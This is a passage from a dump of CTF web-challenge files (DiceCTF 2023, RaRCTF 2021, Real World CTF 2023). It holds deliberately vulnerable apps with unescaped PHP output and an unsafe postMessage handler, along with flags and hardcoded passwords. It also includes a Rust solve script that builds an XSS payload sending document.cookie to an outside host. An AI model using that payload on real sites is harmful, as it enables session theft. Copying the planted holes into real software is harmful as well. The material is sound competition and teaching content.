18 |     }, flag);
19 |     await page.goto(url, { timeout: 3000, waitUntil: 'domcontentloaded' });
20 |     await sleep(3000);
21 |   }
22 | }
23 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/challenge.yml:
--------------------------------------------------------------------------------
 1 | name: recursive-csp
 2 | author: strellic
 3 | description: |-
 4 |   the nonce isn't random, so how hard could this be?
 5 | 
 6 |   (the flag is in the admin bot's cookie)
 7 | 
 8 |   {{ link }}
 9 | 
10 |   [Admin Bot]({{ adminbot }})
11 | flag:
12 |   file: ./flag.txt
13 | sortWeight: 100
14 | containers:
15 |   main:
16 |     replicas: 2
17 |     build: challenge
18 |     ports:
19 |       - 80
20 | expose:
21 |   main:
22 |     - target: 80
23 |       http: recursive-csp
24 |       healthContent: recursive-csp
25 | adminbot: adminbot.js
26 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/challenge/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM php:8.2-apache-buster
2 | 
3 | COPY index.php /var/www/html/index.php


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/challenge/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |   if (isset($_GET["source"])) highlight_file(__FILE__) && die();
 3 | 
 4 |   $name = "world";
 5 |   if (isset($_GET["name"]) && is_string($_GET["name"]) && strlen($_GET["name"]) < 128) {
 6 |     $name = $_GET["name"];
 7 |   }
 8 | 
 9 |   $nonce = hash("crc32b", $name);
10 |   header("Content-Security-Policy: default-src 'none'; script-src 'nonce-$nonce' 'unsafe-inline'; base-uri 'none';");
11 | ?>
12 | <!DOCTYPE html>
13 | <html>
14 |   <head>
15 |     <title>recursive-csp</title>
16 |   </head>
17 |   <body>
18 |     <h1>Hello, <?php echo $name ?>!</h1>
19 |     <h3>Enter your name:</h3>
20 |     <form method="GET">
21 |       <input type="text" placeholder="name" name="name" />
22 |       <input type="submit" />
23 |     </form>
24 |     <!-- /?source -->
25 |   </body>
26 | </html>
27 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/flag.txt:
--------------------------------------------------------------------------------
1 | dice{h0pe_that_d1dnt_take_too_l0ng}


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/solve/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "rsolve"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | crc32fast = "1.3.2"
10 | rayon = "1.6.1"
11 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/recursive-csp/solve/src/main.rs:
--------------------------------------------------------------------------------
 1 | use rayon::prelude::*;
 2 | 
 3 | fn main() {
 4 |     let payload = "<script nonce='ZZZZZZZZ'>window.open('https://z3.is/?'+document.cookie)</script>".to_string();
 5 |     let start = payload.find("Z").unwrap();
 6 |     (0..=0xFFFFFFFFu32).into_par_iter().for_each(|i| {
 7 |         let mut p = payload.clone();
 8 |         p.replace_range(start..start+8, &format!("{:08x}", i));
 9 |         if crc32fast::hash(p.as_bytes()) == i {
10 |             println!("{} {i} {:08x}", p, i);
11 |         }
12 |     });
13 | }
14 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge.yml:
--------------------------------------------------------------------------------
 1 | name: unfinished
 2 | author: strellic
 3 | description: |-
 4 |   It's the day of the CTF and I haven't finished writing this challenge...
 5 | 
 6 |   Well, unfinished doesn't mean unsolvable.
 7 | 
 8 |   [Instancer]({{ instancer }})
 9 | 
10 | flag: dice{i_lied_this_1s_th3_finished_st4te}
11 | sortWeight: 60
12 | provide:
13 |   - unfinished.tar.gz
14 | 
15 | containers:
16 |   app:
17 |     build: ./challenge/app/
18 |     ports:
19 |       - 4444
20 |   mongodb:
21 |     build: ./challenge/mongo/
22 |     ports:
23 |       - 27017
24 |     environment:
25 |       FLAG: dice{i_lied_this_1s_th3_finished_st4te}
26 |     resources:
27 |       limits:
28 |         memory: 300Mi
29 |         cpu: 200m
30 |       requests:
31 |         memory: 100Mi
32 |         cpu: 50m
33 | expose:
34 |   app:
35 |     - target: 4444
36 |       http: unfinished
37 | instancer:
38 |   timeout: 600000


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge/app/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM buildpack-deps:stretch-scm AS builder
 2 | 
 3 | WORKDIR /tmp
 4 | 
 5 | RUN apt-get update && \
 6 |     apt-get install -y --no-install-recommends \
 7 |       g++ gcc libc6-dev make pkg-config
 8 | RUN apt-get install -y libssl-dev
 9 | 
10 | RUN wget -q https://curl.haxx.se/download/curl-7.87.0.tar.gz && \
11 |     tar xzf curl-7.87.0.tar.gz
12 | 
13 | WORKDIR /tmp/curl-7.87.0
14 | 
15 | RUN ./configure --prefix=/build \
16 |       --disable-shared --enable-static --with-openssl \
17 |       --disable-gopher && \
18 |     make && \
19 |     make install
20 | 
21 | FROM node:19-slim
22 | 
23 | COPY --from=builder /build/bin/curl /usr/sbin/curl
24 | 
25 | RUN apt-get update && \
26 |   apt-get install -y ca-certificates && \
27 |   rm -rf /var/lib/apt/lists/*
28 | 
29 | WORKDIR /app
30 | COPY package.json ./
31 | COPY static ./static
32 | RUN npm i
33 | COPY app.js .
34 | 
35 | RUN useradd -ms /bin/bash user
36 | USER user
37 | 
38 | CMD ["/bin/sh", "-c", "while true; do node app.js; done"]


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge/app/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "challenge",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.2",
13 |     "express-session": "^1.17.3",
14 |     "mongodb": "^5.0.0"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 |   app:
4 |     build: ./app/
5 |     ports:
6 |       - "4444:4444"
7 |   mongodb:
8 |     build: ./mongo/


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge/mongo/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM mongo:latest
2 | 
3 | COPY init.js /docker-entrypoint-initdb.d/init.js


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/challenge/mongo/init.js:
--------------------------------------------------------------------------------
1 | const crypto = require("crypto");
2 | 
3 | const app = db.getSiblingDB('app');
4 | app.users.insertOne({ user: crypto.randomBytes(8).toString("hex"), pass: crypto.randomBytes(64).toString("hex") });
5 | 
6 | const secret = db.getSiblingDB('secret');
7 | secret.flag.insertOne({ flag: process.env.FLAG || "dice{test_flag}" });
8 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/make_handout.sh:
--------------------------------------------------------------------------------
1 | cp -r challenge unfinished
2 | tar --owner="strell" --group="strell" -H v7 --no-xattr --mtime=1970-01-01T00:00Z -czvf unfinished.tar.gz unfinished
3 | rm -rf unfinished
4 | 


--------------------------------------------------------------------------------
/DiceCTF-2023/web/unfinished/unfinished.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/DiceCTF-2023/web/unfinished/unfinished.tar.gz


--------------------------------------------------------------------------------
/DiceCTF-at-HOPE-2022/payment-pal/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:18.6.0-bullseye-slim
 2 | 
 3 | WORKDIR /app
 4 | 
 5 | COPY . .
 6 | 
 7 | RUN yarn
 8 | 
 9 | EXPOSE 8080
10 | 
11 | CMD ["node", "/app/index.js"]
12 | 


--------------------------------------------------------------------------------
/DiceCTF-at-HOPE-2022/payment-pal/index.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | 
 3 | const app = express();
 4 | 
 5 | const PORT = process.env.PORT || 8080;
 6 | 
 7 | app.use(require("cookie-parser")());
 8 | app.use(express.static("public"));
 9 | app.use("/graphql", require("./src/graphql.js"));
10 | 
11 | app.listen(PORT, () => console.log(`web/payment-pal listening on port ${PORT}`));


--------------------------------------------------------------------------------
/DiceCTF-at-HOPE-2022/payment-pal/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "payment-pal",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "Strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "cookie-parser": "^1.4.6",
13 |     "express": "^4.18.1",
14 |     "express-graphql": "^0.12.0",
15 |     "graphql": "^15.8.0"
16 |   }
17 | }
18 | 


--------------------------------------------------------------------------------
/DiceCTF-at-HOPE-2022/payment-pal/src/db.js:
--------------------------------------------------------------------------------
 1 | const users = new Map();
 2 | 
 3 | const getUser = (name) => users.get(name);
 4 | const setUser = (name, data) => users.set(name, data);
 5 | 
 6 | (() => {
 7 |     const crypto = require("crypto");
 8 |     const sha256 = (data) => crypto.createHash('sha256').update(data).digest('hex');
 9 | 
10 |     const username = `admin-` + (process.env.ADMIN_SUFFIX || crypto.randomBytes(8).toString("hex"));
11 |     const password = process.env.ADMIN_PASSWORD || crypto.randomBytes(16).toString("hex");
12 |     setUser(username, Object.freeze({
13 |         username,
14 |         password: sha256(password),
15 |         money: 133742069,
16 |         isAdmin: true,
17 |         contacts: Object.freeze([])
18 |     }));
19 |     console.log(`created account: ${username} with password ${password}`);
20 | })();
21 | 
22 | module.exports = {
23 |     getUser,
24 |     setUser
25 | };


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Check out our secure storage solutions for all your secure storing needs! featuring our new secure enclave™ where secrets are stored securely™
 8 | ```
 9 | 
10 | Flag: `crarctf{js_god?_the_wh0le_1nternet_1s_y0ur_d0main!!!_60739238}`
11 | 


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/admin/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules/


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/admin/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-slim
 2 | 
 3 | RUN apt-get update \
 4 |     && apt-get install -y wget gnupg \
 5 |     && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
 6 |     && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
 7 |     && apt-get update \
 8 |     && apt-get install -y google-chrome-stable fonts-ipafont-gothic fonts-wqy-zenhei fonts-thai-tlwg fonts-kacst fonts-freefont-ttf libxss1 \
 9 |       --no-install-recommends \
10 |     && rm -rf /var/lib/apt/lists/*
11 | 
12 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true \
13 |     PUPPETEER_EXECUTABLE_PATH=google-chrome-stable
14 | 
15 | RUN mkdir -p /home/node/app/node_modules && chown -R node:node /home/node/app
16 | 
17 | WORKDIR /home/node/app
18 | 
19 | COPY package.json .
20 | 
21 | RUN npm install
22 | 
23 | COPY . .
24 | 
25 | USER node
26 | 
27 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/admin/index.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | const app = express();
 3 | 
 4 | require("dotenv").config();
 5 | 
 6 | const PORT = process.env.PORT ? parseInt(process.env.PORT) : 80;
 7 | 
 8 | const admin = require("./admin.js");
 9 | 
10 | app.use(express.urlencoded({ extended: false }));
11 | app.use(express.json());
12 | 
13 | app.post("/xss/add", (req, res) => {
14 |     if(!req.headers.authorization || req.headers.authorization !== process.env.XSSBOT_SECRET) {
15 |         return res.end("unauthorized");
16 |     }
17 |     console.log(req.body);
18 |     let { url } = req.body;
19 |     if(!url) {
20 |         return res.end("missing url");
21 |     }
22 |     let length = admin.addToQueue(url);
23 |     res.send({"position": length});
24 |     return res.end();
25 | });
26 | 
27 | app.listen(PORT, () => {
28 |     console.log(`xssbot listening on port ${PORT}`);
29 | });
30 | 


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/admin/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "admin",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "dotenv": "^10.0.0",
13 |     "express": "^4.17.1",
14 |     "puppeteer": "^10.0.0"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules/


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /home/node/app/node_modules && chown -R node:node /home/node/app
 4 | 
 5 | WORKDIR /home/node/app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | USER node
14 | 
15 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "safestorage",
 3 |   "version": "1.0.0",
 4 |   "main": "index.js",
 5 |   "scripts": {
 6 |     "test": "echo \"Error: no test specified\" && exit 1"
 7 |   },
 8 |   "author": "",
 9 |   "license": "ISC",
10 |   "dependencies": {
11 |     "bcrypt": "^5.0.1",
12 |     "dotenv": "^10.0.0",
13 |     "express": "^4.17.1",
14 |     "express-session": "^1.17.2",
15 |     "hbs": "^4.1.2",
16 |     "memorystore": "^1.6.6",
17 |     "node-fetch": "^2.6.1"
18 |   },
19 |   "devDependencies": {},
20 |   "description": ""
21 | }
22 | 


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/public/assets/css/styles.css:
--------------------------------------------------------------------------------
 1 | .secure-sandbox {
 2 |     width: 100vw;
 3 |     height: 70vh;
 4 | }
 5 | 
 6 | .secure-sandbox > iframe {
 7 |     width: 100%;
 8 |     height: 100%;
 9 |     overflow: hidden;
10 | }


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/public/assets/img/vault.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/public/assets/img/vault.png


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/public/script.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |     Secure Storage Service's
 3 |     very secure communication method to talk to a sandboxed secure location
 4 | */
 5 | 
 6 | window.onload = () => {
 7 |     let storage = document.getElementById("secure_storage");
 8 |     let user = document.getElementById("user").innerText;
 9 |     storage.contentWindow.postMessage(["user", user], storage.src);
10 | };
11 | 
12 | const changeMsg = () => {
13 |     let storage = document.getElementById("secure_storage");
14 |     storage.contentWindow.postMessage(["localStorage.message", document.getElementById("message").value], storage.src);
15 | };
16 | 
17 | const changeColor = () => {
18 |     let storage = document.getElementById("secure_storage");
19 |     storage.contentWindow.postMessage(["localStorage.color", document.getElementById("color").value], storage.src);
20 | };


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.eot


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.ttf


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.woff


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-brands-400.woff2


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.eot


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.ttf


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.woff


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-regular-400.woff2


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.eot


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.ttf


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.woff


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/RaRCTF-2021/SecureStorage/chall/secure_safe/assets/webfonts/fa-solid-900.woff2


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/secure_safe/secure.js:
--------------------------------------------------------------------------------
 1 | /* hey... what are you doing here??? 😡 */
 2 | 
 3 | console.log("secure js loaded...");
 4 | 
 5 | const z=(s,i,t=window,y='.')=>s.includes(y)?z(s.substring(s.indexOf(y)+1),i,t[s.split(y).shift()]):t[s]=i;
 6 | 
 7 | var user = "";
 8 | const render = () => {
 9 |     document.getElementById("user").innerText = user;
10 |     document.getElementById("message").innerText = localStorage.message || "None set";
11 |     document.getElementById("message").style.color = localStorage.color || "black";
12 | };
13 | 
14 | window.onmessage = (e) => {
15 |     let { origin, data } = e;
16 |     if(origin !== document.getElementById("site").innerText || !Array.isArray(data)) return;
17 |     z(...data.map(d => `${d}`));
18 |     render();
19 | };


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/views/home.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container mt-3 secure-sandbox">
 2 |     <iframe src="{{SANDBOX_SITE}}" scrolling="no" id="secure_storage"></iframe>
 3 | </div>
 4 | 
 5 | <div class="container my-4">
 6 |     <div class="row">
 7 |         <div class="col-6 form-group d-flex">
 8 |             <input type="text" class="form-control" placeholder="Message" id="message">
 9 |             <button class="btn btn-primary" onclick="changeMsg()">Change</button>
10 |         </div>
11 |         <div class="col-6 form-group d-flex">
12 |             <input type="text" class="form-control" placeholder="Font Color" id="color">
13 |             <button class="btn btn-danger" onclick="changeColor()">Change</button>
14 |         </div>
15 |     </div>
16 | </div>
17 | 
18 | <div class="d-none" id="user">{{user}}</div>
19 | <script type="text/javascript" src="script.js"></script>


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/views/index.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container text-center mt-5">
 2 |     <div class="row">
 3 |         <div class="col">
 4 |             <h1>Welcome to Secure Storage Services!</h1>
 5 |         </div>
 6 |     </div>
 7 |     <div class="row justify-content-center mt-3">
 8 |         <div class="col-4">
 9 |             <img class="img-fluid" src="assets/img/vault.png">
10 |         </div>
11 |     </div>
12 |     <div class="row my-4">
13 |         <div class="col">
14 |             {{#if user}}
15 |             <a class="btn btn-primary" type="button" href="/home">Home</a>
16 |             {{else}}
17 |             <a class="btn btn-primary me-2" type="button" href="/login">Login</a>
18 |             <a class="btn btn-danger" type="button" href="/register">Register</a>
19 |             {{/if}}
20 |         </div>
21 |     </div>
22 | </div>


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/views/login.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container text-center mt-5">
 2 |     <div class="row">
 3 |         <div class="col">
 4 |             <h1>Login</h1>
 5 |         </div>
 6 |     </div>
 7 |     <div class="row my-4 justify-content-center">
 8 |         <div class="col-6">
 9 |             <form method="POST" action="/api/login">
10 |                 <div class="form-group">
11 |                     <label>Username</label>
12 |                     <input type="text" class="form-control" name="user" placeholder="Username">
13 |                 </div>
14 |                 <div class="form-group mt-3">
15 |                     <label>Password</label>
16 |                     <input type="password" class="form-control" name="pass" placeholder="Password">
17 |                 </div>
18 |                 <button type="submit" class="btn btn-primary mt-4">Login</button>
19 |             </form>
20 |         </div>
21 |     </div>
22 | </div>


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/views/register.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container text-center mt-5">
 2 |     <div class="row">
 3 |         <div class="col">
 4 |             <h1>Register</h1>
 5 |         </div>
 6 |     </div>
 7 |     <div class="row my-4 justify-content-center">
 8 |         <div class="col-6">
 9 |             <form method="POST" action="/api/register">
10 |                 <div class="form-group">
11 |                     <label>Username</label>
12 |                     <input type="text" class="form-control" name="user" placeholder="Username">
13 |                 </div>
14 |                 <div class="form-group mt-3">
15 |                     <label>Password</label>
16 |                     <input type="password" class="form-control" name="pass" placeholder="Password">
17 |                 </div>
18 |                 <button type="submit" class="btn btn-danger mt-4">Register</button>
19 |             </form>
20 |         </div>
21 |     </div>
22 | </div>


--------------------------------------------------------------------------------
/RaRCTF-2021/SecureStorage/chall/views/submit.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container text-center mt-5">
 2 |     <div class="row">
 3 |         <div class="col">
 4 |             <h1>Submit</h1>
 5 |         </div>
 6 |     </div>
 7 |     <div class="row my-4 justify-content-center">
 8 |         <p>Found a bug with our software? Send us a link here and we'll check it out.</p>
 9 |         <div class="col-6">
10 |             <form method="POST" action="/api/submit">
11 |                 <div class="form-group">
12 |                     <label>URL</label>
13 |                     <input type="url" class="form-control" name="url" placeholder="URL">
14 |                 </div>
15 |                 <button type="submit" class="btn btn-primary mt-4">Submit</button>
16 |             </form>
17 |         </div>
18 |     </div>
19 | </div>


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node as bot_env
 2 | COPY ./bot/bot.js /bot/bot.js
 3 | WORKDIR /bot
 4 | RUN npm i puppeteer
 5 | RUN npm i redis
 6 | 
 7 | FROM node
 8 | 
 9 | ENV REDIS_PASSWORD=IVK3IEYCO4Q7jzLs8hJi \ 
10 |     ADMIN_PASSWORD=Su2Tv8roEu77H6R8xFBe \
11 |     FLAG=rwctf{val3ntina_e5c4ped_th3_cu1t_with_l33t_op3ner}
12 | 
13 | # Recaptcha keys
14 | # ENV RECAPTCHA_SITE_KEY=SITE_KEY \
15 | #     RECAPTCHA_SECRET_KEY=SECRET_KEY
16 | 
17 | RUN apt update && \
18 |     apt install libgtk-3-dev libnotify-dev libgconf-2-4 libnss3 libxss1 libasound2 redis-server -y && \
19 |     echo "requirepass ${REDIS_PASSWORD}" >> /etc/redis/redis.conf 
20 | 
21 | COPY ./code /app
22 | COPY ./setup.sh /app/setup.sh
23 | COPY --from=bot_env /bot /bot
24 | COPY --from=bot_env /root/.cache /root/.cache
25 | 
26 | WORKDIR /app
27 | 
28 | RUN npm i
29 | 
30 | EXPOSE 12345
31 | 
32 | CMD ["sh","-c","chmod +x ./setup.sh && ./setup.sh"]
33 | 


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/README.md:
--------------------------------------------------------------------------------
 1 | # 8BitCult
 2 | 
 3 | ## Usage
 4 | 
 5 | run command bewlow:
 6 | ```shell
 7 | docker-compose build
 8 | docker-compose up -d
 9 | ```
10 | 
11 | chall: http://your-ip:12345


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "8bitcult",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "axios": "^1.2.2",
13 |     "cookie-parser": "^1.4.6",
14 |     "ejs": "^3.1.8",
15 |     "express": "^4.18.2",
16 |     "express-session": "^1.17.3",
17 |     "redis": "^4.5.1"
18 |   }
19 | }
20 | 


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/src/db.js:
--------------------------------------------------------------------------------
 1 | const crypto = require("crypto");
 2 | 
 3 | const sha256 = (data) => crypto.createHash("sha256").update(data).digest("hex");
 4 | const users = new Map();
 5 | const posts = new Map();
 6 | 
 7 | (() => {
 8 |     let flagId = crypto.randomUUID();
 9 |     console.log(`flag post ID: ${flagId}`);
10 | 
11 |     posts.set(flagId, {
12 |         name: "Flag",
13 |         body: process.env.FLAG || "flag{test_flag}"
14 |     });
15 | 
16 |     users.set("admin", Object.freeze({
17 |         user: "admin",
18 |         pass: sha256(process.env.ADMIN_PASSWORD || "password"),
19 |         posts: Object.freeze([flagId]),
20 |         todos: Object.freeze([])
21 |     }));
22 | 
23 |     console.log(`created user admin | ${process.env.ADMIN_PASSWORD || "password"}`)
24 | })();
25 | 
26 | module.exports = { users, posts };


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/src/middleware.js:
--------------------------------------------------------------------------------
 1 | const requiresLogin = (req, res, next) => {
 2 |     if (!req.user) {
 3 |         return res.redirect("/?msg=Login required");
 4 |     }
 5 |     next();
 6 | };
 7 | 
 8 | const requiresNoLogin = (req, res, next) => {
 9 |     if (req.user) {
10 |         return res.redirect("/?msg=You are already logged in!");
11 |     }
12 |     next();
13 | };
14 | 
15 | const csrfProtection = (req, res, next) => {
16 |     let token = req.body._csrf || req.query._csrf;
17 |     if (!req.session.hasCSRF || req.csrfToken !== token) {
18 |         return res.redirect("/?msg=Invalid CSRF token");
19 |     }
20 |     next();
21 | };
22 | 
23 | module.exports = { requiresLogin, requiresNoLogin, csrfProtection };


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/48x48M.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/48x48M.png


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/48x48Sorriso.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/48x48Sorriso.png


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/64x64blind.png:
--------------------------------------------------------------------------------
